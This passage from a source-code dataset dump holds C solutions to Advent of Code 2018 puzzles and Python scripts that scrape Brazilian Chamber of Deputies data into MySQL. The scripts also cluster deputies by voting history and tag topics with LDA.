(__a) : (__b)) \n\n#define UNIT_EMPTY 0\n#define UNIT_TAKEN 1\n#define UNIT_OVERLAP 2\n// matrix[0]\n// matric[1]\n\nfabric_t *fabric_create(uint32_t min_x, uint32_t min_y)\n{\n fabric_t *fabric = calloc(1, sizeof(fabric_t));\n fabric->width = MAX(min_x, FABRIC_SIDE_MIN);\n fabric->height = MAX(min_y, FABRIC_SIDE_MIN);\n fabric->matrix = calloc(fabric->height, sizeof(uint32_t *));\n for (uint32_t i = 0; i < fabric->height; ++i) {\n fabric->matrix[i] = calloc(fabric->width, sizeof(uint32_t));\n }\n\n return fabric;\n}\n\nvoid fabric_free(fabric_t *fabric)\n{\n if (fabric && fabric->matrix) {\n for (uint32_t i = 0; i < fabric->height; ++i) {\n free(fabric->matrix[i]);\n }\n free(fabric->matrix);\n free(fabric);\n }\n}\n\nvoid fabric_claim_area(fabric_t *fabric, claim_t *claim)\n{\n uint32_t y_end = claim->from_top + claim->height;\n uint32_t x_end = claim->from_left + claim->width;\n for (uint32_t y = claim->from_top; y < y_end; ++y) {\n for (uint32_t x = claim->from_left; x < x_end; ++x) {\n uint32_t *valuep = &fabric->matrix[y][x];\n switch (*valuep) {\n case UNIT_EMPTY:\n *valuep = UNIT_TAKEN;\n break;\n case UNIT_TAKEN:\n *valuep = UNIT_OVERLAP;\n break;\n default:\n break;\n }\n }\n }\n}\n\nbool fabric_check_claim(fabric_t *fabric, claim_t *claim)\n{\n uint32_t y_end = claim->from_top + claim->height;\n uint32_t x_end = claim->from_left + claim->width;\n for (uint32_t y = claim->from_top; y < y_end; ++y) {\n for (uint32_t x = claim->from_left; x < x_end; ++x) {\n uint32_t value = fabric->matrix[y][x];\n if (value == UNIT_OVERLAP) {\n return false;\n }\n }\n }\n return true;\n}\n\nuint32_t fabric_compute_overlap(fabric_t *fabric)\n{\n uint32_t overlap = 0;\n for (uint32_t y = 0; y < fabric->height; ++y) {\n for (uint32_t x = 0; x < fabric->width; ++x) {\n if (fabric->matrix[y][x] == UNIT_OVERLAP) {\n overlap++;\n }\n }\n }\n return overlap;\n}\n\nint main(int argc, char *argv[])\n{\n if (argc < 2) {\n printf(\"usage: %s [input]\\n\", getprogname());\n return EXIT_FAILURE;\n }\n\n file_t *file = file_get_lines(argv[1], parse_claim, free_claim, NULL);\n DIE_IF((file == NULL), \"Could not read lines from %s\\n\", argv[1]);\n\n int furthest_x = 0;\n int furthest_y = 0;\n line_t *line = NULL;\n size_t i = 0;\n file_for_each_line(file, line, i) {\n claim_t *claim = line_extra_data(line);\n int x = claim->from_left + claim->width;\n int y = claim->from_top + claim->height;\n if (x > furthest_x) {\n furthest_x = x;\n }\n\n if (y > furthest_y) {\n furthest_y = y;\n }\n }\n fabric_t *fabric = fabric_create(furthest_x, furthest_y);\n\n file_for_each_line(file, line, i) {\n claim_t *claim = line_extra_data(line); \n fabric_claim_area(fabric, claim);\n }\n\n uint32_t overlap = fabric_compute_overlap(fabric);\n printf(\"Total Overlap: %u\\n\", overlap);\n\n file_for_each_line(file, line, i) {\n claim_t *claim = line_extra_data(line); \n bool no_overlap = fabric_check_claim(fabric, claim);\n if (no_overlap) {\n printf(\"Claim %u doesn't have any overlap\\n\", claim->id);\n break;\n }\n }\n\n fabric_free(fabric);\n file_free(file);\n\n return 0;\n}\n" }, { "alpha_fraction": 0.5023611783981323, "alphanum_fraction": 0.5179938077926636, "avg_line_length": 30.015151977539062, "blob_id": "c06baed6f891a24de46c9bf52c2cf4b51ca80a15", "content_id": "c2618bea15a703e1444899159f59bc41ecc252a3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 6141, "license_type": "permissive", "max_line_length": 302, "num_lines": 198, "path": "/Day4/Day4.c", "repo_name": 
"pwmoore/AdventOfCode2018", "src_encoding": "UTF-8", "text": "#include <time.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <string.h>\n#include <stdbool.h>\n#include <bsd/stdlib.h>\n\n#include \"file.h\"\n#include \"utils.h\"\n\ntypedef enum\n{\n EVENT_BEGIN_SHIFT = 0,\n EVENT_FALL_ASLEEP,\n EVENT_WAKEUP,\n} event_type_t;\n\ntypedef struct event\n{\n uint32_t guard_id;\n event_type_t type;\n struct tm datetime; \n time_t time;\n} event_t;\n\ntypedef struct guard_stats\n{\n uint32_t guard_id;\n uint32_t most_seen_minute;\n uint32_t minutes[60];\n uint32_t total_minutes_asleep;\n} guard_stats_t;\n\ntypedef struct minute_stats\n{\n uint32_t guard_id;\n uint32_t times_asleep;\n} minute_stats_t;\n\nuint32_t highest_guard_id = 0;\n\nbool parse_event(line_t *line)\n{\n event_t *event = calloc(1, sizeof(event_t));\n char *s = line_string(line);\n char *event_str = NULL;\n sscanf(s, \"[%d-%d-%d %02d:%02d] \", &event->datetime.tm_year, &event->datetime.tm_mon, &event->datetime.tm_mday, &event->datetime.tm_hour, &event->datetime.tm_min);\n event->datetime.tm_isdst = 1;\n event->datetime.tm_year = 2018 - 1900;\n event->datetime.tm_mon--;\n event->time = timegm(&event->datetime);\n char *leftbracket = strchr(s, ']');\n event_str = leftbracket + 2;\n if (!strcmp(event_str, \"falls asleep\")) {\n event->type = EVENT_FALL_ASLEEP;\n } else if (!strcmp(event_str, \"wakes up\")) {\n event->type = EVENT_WAKEUP;\n } else {\n event->type = EVENT_BEGIN_SHIFT;\n sscanf(event_str, \"Guard #%u begins shift\", &event->guard_id);\n if (event->guard_id > highest_guard_id) {\n highest_guard_id = event->guard_id;\n }\n }\n \n line->extra = event;\n return true;\n}\n\nvoid free_event(line_t *line)\n{\n free(line->extra);\n}\n\nchar *event_make_string(event_t *event)\n{\n static char buf[1024] = {0};\n switch (event->type) {\n case EVENT_WAKEUP:\n return \"wakes up\";\n case EVENT_FALL_ASLEEP:\n return \"falls asleep\";\n case EVENT_BEGIN_SHIFT:\n memset(buf, 0, sizeof(buf));\n snprintf(buf, 1024, \"Guard #%u begins shift\", event->guard_id);\n return buf;\n default:\n return \"Unknown event?!?!\";\n }\n}\n\nint sort_event(const void *a, const void *b)\n{\n line_t *l1 = *(line_t **)a;\n line_t *l2 = *(line_t **)b;\n event_t *e1 = l1->extra;\n event_t *e2 = l2->extra;\n time_t t1 = e1->time;\n time_t t2 = e2->time;\n\n if (t1 == t2) {\n return 0;\n } else if (t1 < t2) {\n return -1;\n } else {\n return 1;\n }\n}\n\nint main(int argc, char *argv[])\n{\n if (argc < 2) {\n printf(\"usage: %s [input]\\n\", getprogname());\n return EXIT_FAILURE;\n }\n\n file_t *file = file_get_lines(argv[1], parse_event, free_event, sort_event);\n DIE_IF((file == NULL), \"Could not read lines from %s\\n\", argv[1]);\n\n line_t *line = NULL;\n size_t i = 0;\n file_sort_lines(file);\n guard_stats_t *stats = calloc(highest_guard_id, sizeof(guard_stats_t));\n\n uint32_t current_id = 0;\n uint32_t fall_asleep = 0;\n uint32_t wakeup = 0;\n guard_stats_t *most_sleepy_guard = NULL;\n minute_stats_t minutes[60];\n memset((void *)&minutes[0], 0, sizeof(minutes));\n uint32_t most_seen_minute = -1;\n uint32_t times_most_seen_minute = 0;\n file_for_each_line(file, line, i) {\n event_t *event = line_extra_data(line);\n switch (event->type) {\n case EVENT_BEGIN_SHIFT:\n {\n current_id = event->guard_id - 1;\n stats[current_id].guard_id = event->guard_id;\n if (most_sleepy_guard == NULL) {\n most_sleepy_guard = &stats[current_id];\n }\n break;\n }\n case EVENT_FALL_ASLEEP:\n {\n fall_asleep = event->datetime.tm_min;\n break;\n }\n 
case EVENT_WAKEUP:\n {\n wakeup = event->datetime.tm_min;\n guard_stats_t *gs = &stats[current_id];\n gs->total_minutes_asleep += (wakeup - fall_asleep);\n if (gs->guard_id != most_sleepy_guard->guard_id) {\n if (gs->total_minutes_asleep > most_sleepy_guard->total_minutes_asleep) {\n most_sleepy_guard = gs;\n }\n }\n for (uint32_t i = fall_asleep; i < wakeup; ++i) {\n gs->minutes[i] += 1;\n if (gs->minutes[i] > gs->minutes[gs->most_seen_minute]) {\n gs->most_seen_minute = i;\n }\n\n if (minutes[i].times_asleep == 0) {\n minutes[i].guard_id = gs->guard_id;\n minutes[i].times_asleep = 1;\n } else {\n if (gs->minutes[i] > minutes[i].times_asleep) {\n minutes[i].guard_id = gs->guard_id;\n minutes[i].times_asleep = gs->minutes[i];\n }\n }\n\n if (most_seen_minute == (uint32_t)-1) {\n most_seen_minute = i; \n times_most_seen_minute = 1;\n } else {\n if (times_most_seen_minute < minutes[i].times_asleep) {\n most_seen_minute = i;\n times_most_seen_minute = minutes[i].times_asleep;\n }\n }\n }\n break;\n }\n }\n }\n\n printf(\"The most sleepy guard is %u with %u total minutes asleep, and is most often asleep at minute %u. Answer is %u\\n\", most_sleepy_guard->guard_id, most_sleepy_guard->total_minutes_asleep, most_sleepy_guard->most_seen_minute, (most_sleepy_guard->guard_id * most_sleepy_guard->most_seen_minute));\n printf(\"Guard %u spent minute %u more than any other guard or minute. Answer is %u\\n\", minutes[most_seen_minute].guard_id, most_seen_minute,(minutes[most_seen_minute].guard_id * most_seen_minute));\n free(stats);\n file_free(file);\n\n return 0;\n}\n" }, { "alpha_fraction": 0.5769230723381042, "alphanum_fraction": 0.6373626589775085, "avg_line_length": 19.22222137451172, "blob_id": "34e775de7af4fed2a30368482889ee7e44b3c2a1", "content_id": "05c013e906f50664b2b60af5dcbe186d8d52246c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 182, "license_type": "permissive", "max_line_length": 89, "num_lines": 9, "path": "/Day1/Makefile", "repo_name": "pwmoore/AdventOfCode2018", "src_encoding": "UTF-8", "text": "BIN=Day1\nGLIBFLAGS=-I/usr/include/glib-2.0 -I/usr/lib/x86_64-linux-gnu/glib-2.0/include -lglib-2.0\n\n$(BIN): $(BIN).c\n\tcc $^ $(GLIBFLAGS) -lbsd -o $@\n\n.PHONY: clean\nclean:\n\trm $(BIN)\n" }, { "alpha_fraction": 0.553648054599762, "alphanum_fraction": 0.6051502227783203, "avg_line_length": 9.590909004211426, "blob_id": "1be75e8ec4c07c3e251f91ec9c773fa8b89b416d", "content_id": "b4320041b98a97856bbcb3b26e8403e2bd1dc87f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 233, "license_type": "permissive", "max_line_length": 25, "num_lines": 22, "path": "/Makefile", "repo_name": "pwmoore/AdventOfCode2018", "src_encoding": "UTF-8", "text": "DAYS=Day1 Day2 Day3 Day4\n\n.PHONY: all clean $(DAYS)\nall: $(DAYS)\n\nDay1: \n\tmake -C $@\n\nDay2: \n\tmake -C $@\n\nDay3: \n\tmake -C $@\n\nDay4: \n\tmake -C $@\n\nclean:\n\tmake clean -C Day1\n\tmake clean -C Day2\n\tmake clean -C Day3\n\tmake clean -C Day4\n" } ]
13
vinicius-dourado/chamberofdeputiesBrazil
https://github.com/vinicius-dourado/chamberofdeputiesBrazil
2dae9ab2917fa883f9987b7487b81c21bd545bc5
0bed4a0bfe908db2ec716571e384889e32d42699
eaf86c6d54712e861ba67291defce03212a29c44
refs/heads/master
2022-09-16T22:04:03.811230
2017-11-01T13:32:51
2017-11-01T13:32:51
109,134,396
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6261510252952576, "alphanum_fraction": 0.6440410614013672, "avg_line_length": 30.22881317138672, "blob_id": "0266a8996bc9835ee5564b90cacbd85face8a809", "content_id": "4eedfab1c4c3947e4d02ef66f1931a01e1440b19", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3832, "license_type": "no_license", "max_line_length": 141, "num_lines": 118, "path": "/categorizacao_automatica.py", "repo_name": "vinicius-dourado/chamberofdeputiesBrazil", "src_encoding": "UTF-8", "text": "# coding: utf-8\r\nfrom __future__ import print_function\r\nfrom time import time\r\nimport sys\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer\r\nfrom sklearn.decomposition import NMF, LatentDirichletAllocation\r\nfrom sklearn.datasets import fetch_20newsgroups\r\nimport numpy as np\r\nimport lda\r\nimport nltk\r\nimport unicodedata\r\nimport csv\r\nimport pandas as pd\r\n\r\n\r\ndef get_vocab(data_samples):\r\n vocab = set()\r\n for v in data_samples:\r\n tokens = v.split()\r\n for token in tokens:\r\n vocab.add(token)\r\n return tuple(vocab)\r\n\r\ndef force_decode(string, codecs=['utf8', 'cp1252']):\r\n for i in codecs:\r\n try:\r\n return string.decode(i)\r\n except:\r\n pass\r\n\r\nif len(sys.argv) != 3:\r\n print('usage: python topics_extraction_with_nmf_lda.py text-deputados.txt list-deputados.txt')\r\n sys.exit()\r\n\r\nn_features = 1000\r\nn_topics = 20\r\nn_top_words = 10\r\n\r\n# lendo os dados dos deputados\r\ndep_file = open('info_deputados.csv', 'r', encoding='utf-8')\r\nlinha = dep_file.readline()\r\ndata_samples = linha.split(',')\r\n\r\n# calculando tf-idf\r\nprint(\"Extracting tf-idf features for NMF...\")\r\nsw = nltk.corpus.stopwords.words('portuguese')\r\ntfidf_vectorizer = TfidfVectorizer(max_df=0.95, min_df=2, #max_features=n_features,\r\n stop_words=sw)\r\n\r\ndata = []\r\nfor x in data_samples:\r\n try:\r\n data.append(str(unicodedata.normalize('NFKD', force_decode(x)).encode('utf-8','ignore')))\r\n except:\r\n pass\r\n\r\n#data_samples = [str(unicodedata.normalize('NFKD', force_decode(x)).encode('utf-8','ignore')).encode('utf-8','ignore') for x in data_samples]\r\n\r\n#print(data_samples)\r\ntfidf = tfidf_vectorizer.fit_transform(data_samples)\r\ntf_vectorizer = CountVectorizer(max_df=0.95, min_df=2, max_features=n_features,\r\n stop_words=sw)\r\ntf = tf_vectorizer.fit_transform(data_samples)\r\n\r\n\r\n# aplicando LDA. Escolher mais iterações quando for executar para valer\r\nnew_model = lda.LDA(n_topics=20, n_iter=30, random_state=1)\r\nnew_model.fit(tf)\r\n\r\n# imprimindo deputado e o tópico ao qual ele está mais relacionado. Aqui é\r\n# importante que você saiba quem é o deputado 0, o deputado 1 e assim por diante. 
\r\ndoc_topic = new_model.doc_topic_\r\n#for i in range(len(data_samples)):\r\n #print(\"deputado: {} (top topic: {})\".format(i, doc_topic[i].argmax()))\r\n\r\n#gerando vocab\r\nvocab = get_vocab(data_samples)\r\n\r\n# imprimindo o vocabulário de cada tópico\r\ntopic_word = new_model.topic_word_\r\n#for i, topic_dist in enumerate(topic_word):\r\n# topic_words = np.array(vocab)[np.argsort(topic_dist)][:-n_top_words:-1]\r\n #print('Topic {}: {}'.format(i, ' '.join(topic_words)))\r\n\r\n# lendo os deputados\r\ndep = open(sys.argv[2], 'r')\r\nlin = dep.readline()\r\ndata_deps = lin.split(',')\r\n\r\ndict_tags = {\r\n 0: \"construção, meiofios, calçados\",\r\n 1: \"esporte, arquitetura e autismo\",\r\n 2: \"esporte\",\r\n 3: \"educação\",\r\n 4: \"saúde, itapiranga, calçados\",\r\n 5: \"''\",\r\n 6: \"autismo, esporte, educação\",\r\n 7: \"política, agricultura\",\r\n 8: \"polícia, religião\",\r\n 9: \"autismo, esporte, jiujitsu, massagueira\",\r\n 10: \"agroturismo\",\r\n 11: \"educação, esporte\",\r\n 12: \"''\",\r\n 13: \"religião\",\r\n 14: \"portos\",\r\n 15: \"energia, construção, infraestrutura, autismo\",\r\n 16: \"mananciais, máquinas, escavadeiras\",\r\n 17: \"saúde, atendimentos, mucuriba\",\r\n 18: \"infraestrutura, elétrica, calçados\",\r\n 19: \"fenaporto, mucuri, pirapó\"\r\n}\r\n\r\nwith open('dep_temas.csv', 'w') as csvfile:\r\n fieldnames = ['Autor.id', 'TEMAS']\r\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\r\n writer.writeheader()\r\n for i in range(len(data_deps)):\r\n writer.writerow({'Autor.id': data_deps[i], 'TEMAS': dict_tags[doc_topic[i].argmax()]})" }, { "alpha_fraction": 0.6672069430351257, "alphanum_fraction": 0.6796326041221619, "avg_line_length": 34.97999954223633, "blob_id": "d198ef1eba0238587dce6107939a3561b0b18f2d", "content_id": "e38931983c2f9b890d7004e6e44c7823606e49fa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1851, "license_type": "no_license", "max_line_length": 136, "num_lines": 50, "path": "/cluster_deputadoshistoricovotacoes.py", "repo_name": "vinicius-dourado/chamberofdeputiesBrazil", "src_encoding": "UTF-8", "text": "import pandas as pd\r\n# Read in the csv file\r\nvotes = pd.read_csv(\"votoprop.csv\")\r\n\r\n# As you can see, there are 100 senators, and they voted on 15 bills (we subtract 3 because the first 3 columns aren't bills).\r\nprint(votes.shape)\r\nvotes\r\n# We have more \"Yes\" votes than \"No\" votes overall\r\nprint(pd.value_counts(votes.iloc[:,1:].values.ravel()))\r\n\r\n########################################################\r\n\r\nimport pandas as pd\r\n\r\n# The kmeans algorithm is implemented in the scikits-learn library\r\nfrom sklearn.cluster import KMeans\r\n\r\n# Create a kmeans model on our data, using 2 clusters. 
random_state helps ensure that the algorithm returns the same results each time.\r\nkmeans_model = KMeans(n_clusters=4, random_state=1).fit(votes.iloc[:, 1:])\r\n\r\n# These are our fitted labels for clusters -- the first cluster has label 0, and the second has label 1.\r\nlabels = kmeans_model.labels_\r\n\r\n# The clustering looks pretty good!\r\n# It has separated the deputies into groups based purely on voting history\r\nprint(pd.crosstab(labels, votes[\"deputado\"]))\r\nlabels\r\n\r\n# Let's call these types of voters \"oddballs\" (why not?)\r\n# NOTE: votoprop.csv only has a 'deputado' column plus one column per votacao, so the\r\n# 'party'/'name' lookups below (left over from the original senators tutorial) would\r\n# raise a KeyError; they are disabled here.\r\n#democratic_oddballs = votes[(labels == 1) & (votes[\"party\"] == \"D\")]\r\n#print(democratic_oddballs[\"name\"])\r\n\r\n\r\n###################################################\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.decomposition import PCA\r\npca_2 = PCA(4)\r\n\r\n# Reduce the vote data to principal components with PCA (only the first two are plotted)\r\nplot_columns = pca_2.fit_transform(votes.iloc[:,1:33])\r\n\r\n# Plot deputies based on the first two dimensions, and shade by cluster label\r\n# You can see the plot by clicking \"plots\" to the bottom right\r\nplt.scatter(x=plot_columns[:,0], y=plot_columns[:,1], c=labels)\r\n\r\nplt.show()\r\n\r\n" }, { "alpha_fraction": 0.6725525856018066, "alphanum_fraction": 0.67392498254776, "avg_line_length": 64.0297622680664, "blob_id": "4aad2ffb5c6d0922f64af58b6f00a3c66a56", "content_id": "41180565a930926d410963fdb027bb6f3f011dfe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10930, "license_type": "no_license", "max_line_length": 260, "num_lines": 168, "path": "/obterdados_deputados.py", "repo_name": "vinicius-dourado/chamberofdeputiesBrazil", "src_encoding": "UTF-8", "text": "import urllib\nimport argparse\nimport os.path\nimport xml.etree.ElementTree as ET\nimport urllib.request\nimport urllib.parse\nimport pickle as pkl\nimport pandas as pd \nimport sqlalchemy\nfrom sqlalchemy import create_engine\nimport pymysql\n\ndeputado_url = (\"http://www.camara.gov.br/SitCamaraWS/Deputados.asmx/\"\n                \"ObterDeputados\")\n\ndeputados = []\nwith urllib.request.urlopen(deputado_url) as res:\n    data = ET.fromstring(res.read())\n    for item in data:\n        idecadastro = item.find('ideCadastro').text,\n        condicao = item.find('condicao').text,\n        nome = item.find('nome').text,\n        nomeParlamentar = item.find('nomeParlamentar').text,\n        urlFoto = item.find('urlFoto').text,\n        sexo = item.find('sexo').text,\n        uf = item.find('uf').text,\n        partido = item.find('partido').text,\n        gabinete = item.find('gabinete').text,\n        anexo = item.find('anexo').text,\n        fone = item.find('fone').text,\n        email = item.find('email').text\n        deputados.append([idecadastro, condicao, nome, nomeParlamentar, urlFoto, sexo, uf, partido, gabinete, anexo, fone, email])\n\ndf = pd.DataFrame(deputados, columns = [\"idecadastro\", \"condicao\", \"nome\", \"nomeParlamentar\", \"urlFoto\", \"sexo\", \"uf\", \"partido\", \"gabinete\", \"anexo\", \"fone\", \"email\"])\n\ndetalhes = [] \npartido_atual = []\ngabinete = []\ncomissoes = []\ncargosComissoes = []\nperiodosExercicio = []\nhistoricoNomeParlamentar = []\nfiliacoesPartidarias = []\nhistoricoLider = []\n\nfor x in deputados:\n    detalhes_url = (\"http://www.camara.gov.br/SitCamaraWS/Deputados.asmx/\"\n                    \"ObterDetalhesDeputado?%s\")\n\n    params = urllib.parse.urlencode({\n        'ideCadastro': x[0][0],\n        'numLegislatura': 55})\n    \n    with 
urllib.request.urlopen(detalhes_url % params) as res:\n data = ET.fromstring(res.read())\n dep = data.find('Deputado')\n ideCadastro = dep.find('ideCadastro').text,\n email = dep.find('email').text,\n nomeProfissao = dep.find('nomeProfissao').text,\n dataNascimento = dep.find('dataNascimento').text,\n dataFalecimento = dep.find('dataFalecimento').text,\n ufRepresentacaoAtual = dep.find('ufRepresentacaoAtual').text,\n situacaoNaLegislaturaAtual = dep.find('situacaoNaLegislaturaAtual').text,\n nomeParlamentarAtual = dep.find('nomeParlamentarAtual').text,\n nomeCivil = dep.find('nomeCivil').text,\n sexo = dep.find('sexo').text\n detalhes.append([ideCadastro, email, nomeProfissao, dataNascimento, dataFalecimento, ufRepresentacaoAtual, situacaoNaLegislaturaAtual, nomeParlamentarAtual, nomeCivil, sexo])\n #montando o partidoAtual\n pta = dep.find('partidoAtual')\n idPartido = pta.find('idPartido').text,\n sigla = pta.find('sigla').text,\n nome = pta.find('nome').text\n partido_atual.append([ideCadastro, idPartido, sigla, nome])\n #montando os gabinetes\n for gbn in dep.findall('gabinete'):\n numero = gbn.find('numero').text,\n anexo = gbn.find('anexo').text,\n telefone = gbn.find('telefone').text\n gabinete.append([ideCadastro, numero, anexo, telefone])\n #montando as comissoes que o deputado participa\n for comissao in dep.find('comissoes'):\n idOrgaoLegislativoCD = comissao.find('idOrgaoLegislativoCD').text,\n siglaComissao = comissao.find('siglaComissao').text,\n nomeComissao = comissao.find('nomeComissao').text,\n condicaoMembro = comissao.find('condicaoMembro').text,\n dataEntrada = comissao.find('dataEntrada').text,\n dataSaida = comissao.find('dataSaida').text\n comissoes.append([ideCadastro, idOrgaoLegislativoCD, siglaComissao, nomeComissao, condicaoMembro, dataEntrada, dataSaida])\n #montando cargoComissoes\n cargos_comissoes = dep.find('cargosComissoes')\n for cargo in cargos_comissoes:\n idOrgaoLegislativoCD = cargo.find('idOrgaoLegislativoCD').text,\n siglaComissao = cargo.find('siglaComissao').text,\n nomeComissao = cargo.find('nomeComissao').text,\n idCargo = cargo.find('idCargo').text,\n nomeCargo = cargo.find('nomeCargo').text,\n dataEntrada = cargo.find('dataEntrada').text,\n dataSaida = cargo.find('dataSaida').text\n cargosComissoes.append([ideCadastro, idOrgaoLegislativoCD, siglaComissao, nomeComissao, idCargo, nomeCargo, dataEntrada, dataSaida ])\n #montando periodosExercicio\n periodos_exercicio = dep.find('periodosExercicio')\n for periodo in periodos_exercicio:\n siglaUFRepresentacao = periodo.find('siglaUFRepresentacao').text,\n situacaoExercicio = periodo.find('situacaoExercicio').text,\n dataInicio = periodo.find('dataInicio').text,\n dataFim = periodo.find('dataFim').text,\n idCausaFimExercicio = periodo.find('idCausaFimExercicio').text,\n descricaoCausaFimExercicio = periodo.find('descricaoCausaFimExercicio').text,\n idCadastroParlamentarAnterior = periodo.find('idCadastroParlamentarAnterior').text\n periodosExercicio.append([ideCadastro, siglaUFRepresentacao, situacaoExercicio, dataInicio, dataFim, idCausaFimExercicio, descricaoCausaFimExercicio, idCadastroParlamentarAnterior ])\n #montando historicoNomeParlamentar\n historico_nome = dep.find('historicoNomeParlamentar')\n for nome in historico_nome:\n nomeParlamentarAnterior = nome.find('nomeParlamentarAnterior').text,\n nomeParlamentaPosterior = nome.find('nomeParlamentaPosterior').text,\n dataInicioVigenciaNomePosterior = nome.find('dataInicioVigenciaNomePosterior').text\n 
historicoNomeParlamentar.append([ideCadastro, nomeParlamentarAnterior, nomeParlamentaPosterior, dataInicioVigenciaNomePosterior])\n #montando filiacoesPartidarias\n filiacoes = dep.find('filiacoesPartidarias')\n for filiacao in filiacoes:\n idPartidoAnterior = filiacao.find('idPartidoAnterior').text,\n siglaPartidoAnterior = filiacao.find('siglaPartidoAnterior').text,\n nomePartidoAnterior = filiacao.find('nomePartidoAnterior').text,\n idPartidoPosterior = filiacao.find('idPartidoPosterior').text,\n siglaPartidoPosterior = filiacao.find('siglaPartidoPosterior').text,\n nomePartidoPosterior = filiacao.find('nomePartidoPosterior').text,\n dataFiliacaoPartidoPosterior = filiacao.find('dataFiliacaoPartidoPosterior').text\n filiacoesPartidarias.append([ideCadastro, idPartidoAnterior, siglaPartidoAnterior, nomePartidoAnterior, idPartidoPosterior, siglaPartidoPosterior, nomePartidoPosterior, dataFiliacaoPartidoPosterior])\n #montando historicoLideranca\n historico_lider = dep.find('historicoLider')\n for lider in historico_lider:\n idHistoricoLider = lider.find('idHistoricoLider').text,\n idCargoLideranca = lider.find('idCargoLideranca').text,\n descricaoCargoLideranca = lider.find('descricaoCargoLideranca').text,\n numOrdemCargo = lider.find('numOrdemCargo').text,\n dataDesignacao = lider.find('dataDesignacao').text,\n dataTermino = lider.find('dataTermino').text,\n codigoUnidadeLideranca = lider.find('codigoUnidadeLideranca').text,\n siglaUnidadeLideranca = lider.find('siglaUnidadeLideranca').text,\n idBlocoPartido = lider.find('idBlocoPartido').text\n historicoLider.append([ideCadastro, idHistoricoLider, idCargoLideranca, descricaoCargoLideranca, numOrdemCargo, dataDesignacao, dataTermino, codigoUnidadeLideranca, siglaUnidadeLideranca, idBlocoPartido])\n\n\ndf_detalhes = pd.DataFrame(detalhes, columns = [\"ideCadastro\", \"email\", \"nomeProfissao\", \"dataNascimento\", \"dataFalecimento\", \"ufRepresentacaoAtual\", \"situacaoNaLegislaturaAtual\", \"nomeParlamentarAtual\", \"nomeCivil\", \"sexo\" ])\ndf_partidoatual = pd.DataFrame(partido_atual, columns=[\"ideCadastro\", \"idPartido\", \"sigla\", \"nome\"])\ndf_gabinete = pd.DataFrame(gabinete, columns=[\"ideCadastro\", \"numero\", \"anexo\", \"telefone\"])\ndf_comissoes = pd.DataFrame(comissoes , columns=[\"ideCadastro\", \"idOrgaoLegislativoCD\", \"siglaComissao\", \"nomeComissao\", \"condicaoMembro\", \"dataEntrada\", \"dataSaida\"])\ndf_cargosComissoes = pd.DataFrame(cargosComissoes , columns=[\"ideCadastro\", \"idOrgaoLegislativoCD\", \"siglaComissao\", \"nomeComissao\", \"idCargo\", \"nomeCargo\", \"dataEntrada\", \"dataSaida\"])\ndf_periodosExercicio = pd.DataFrame(periodosExercicio , columns=[\"ideCadastro\", \"siglaUFRepresentacao\", \"situacaoExercicio\", \"dataInicio\", \"dataFim\", \"idCausaFimExercicio\", \"descricaoCausaFimExercicio\", \"idCadastroParlamentarAnterior\"])\ndf_historicoNomeParlamentar = pd.DataFrame(historicoNomeParlamentar , columns=[\"ideCadastro\", \"nomeParlamentarAnterior\", \"nomeParlamentaPosterior\", \"dataInicioVigenciaNomePosterior\"])\ndf_filiacoesPartidarias = pd.DataFrame(filiacoesPartidarias , columns=[\"ideCadastro\", \"idPartidoAnterior\", \"siglaPartidoAnterior\", \"nomePartidoAnterior\", \"idPartidoPosterior\", \"siglaPartidoPosterior\", \"nomePartidoPosterior\", \"dataFiliacaoPartidoPosterior\"])\ndf_historicoLider = pd.DataFrame(historicoLider , columns=[\"ideCadastro\", \"idHistoricoLider\", \"idCargoLideranca\", \"descricaoCargoLideranca\", \"numOrdemCargo\", \"dataDesignacao\", 
\"dataTermino\", \"codigoUnidadeLideranca\", \"siglaUnidadeLideranca\", \"idBlocoPartido\"])\n\n\nengine = create_engine('mysql+pymysql://root:@127.0.0.1:3306/camara?charset=utf8', echo=False)\n###########\ndf.to_sql(name='deputado', con=engine, if_exists='replace')\ndf_detalhes.to_sql(name='detalhes', con=engine, if_exists='replace')\ndf_partidoatual.to_sql(name='partidoatual', con=engine, if_exists='replace')\ndf_gabinete.to_sql(name='gabinete', con=engine, if_exists='replace')\ndf_comissoes.to_sql(name='comissoes', con=engine, if_exists='replace')\ndf_cargosComissoes.to_sql(name='cargosComissoes', con=engine, if_exists='replace')\ndf_periodosExercicio.to_sql(name='periodosExercicio', con=engine, if_exists='replace')\ndf_historicoNomeParlamentar.to_sql(name='historicoNomeParlamentar', con=engine, if_exists='replace')\ndf_filiacoesPartidarias.to_sql(name='filiacoesPartidarias', con=engine, if_exists='replace')\ndf_historicoLider.to_sql(name='historicoLider', con=engine, if_exists='replace')\n###########\nconn.close()\n\n\n\n\n\n" }, { "alpha_fraction": 0.628579318523407, "alphanum_fraction": 0.6351872086524963, "avg_line_length": 50.514286041259766, "blob_id": "cb5a6c57171a8866eae88726d301deae250f3b5b", "content_id": "dfc899766a6e1f254873c99bba31e657f712a96e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3632, "license_type": "no_license", "max_line_length": 188, "num_lines": 70, "path": "/obter_SessoesReunioes.py", "repo_name": "vinicius-dourado/chamberofdeputiesBrazil", "src_encoding": "UTF-8", "text": "import urllib\nimport argparse\nimport os.path\nimport xml.etree.ElementTree as ET\nimport urllib.request\nimport urllib.parse\nimport pickle as pkl\nimport pandas as pd \nimport sqlalchemy\nfrom sqlalchemy import create_engine\nimport mysqldb\n\nsessoesreunioes_url = (\"http://www.camara.gov.br/sitcamaraws/SessoesReunioes.asmx/\"\n \"ListarDiscursosPlenario?dataIni=16/11/2016&dataFim=16/11/2016&codigoSessao=&parteNomeParlamentar=&siglaPartido=&siglaUF=\")\n \n \nsessoesreunioes = []\nfasesSessao = []\ndiscursosSessao = []\nwith 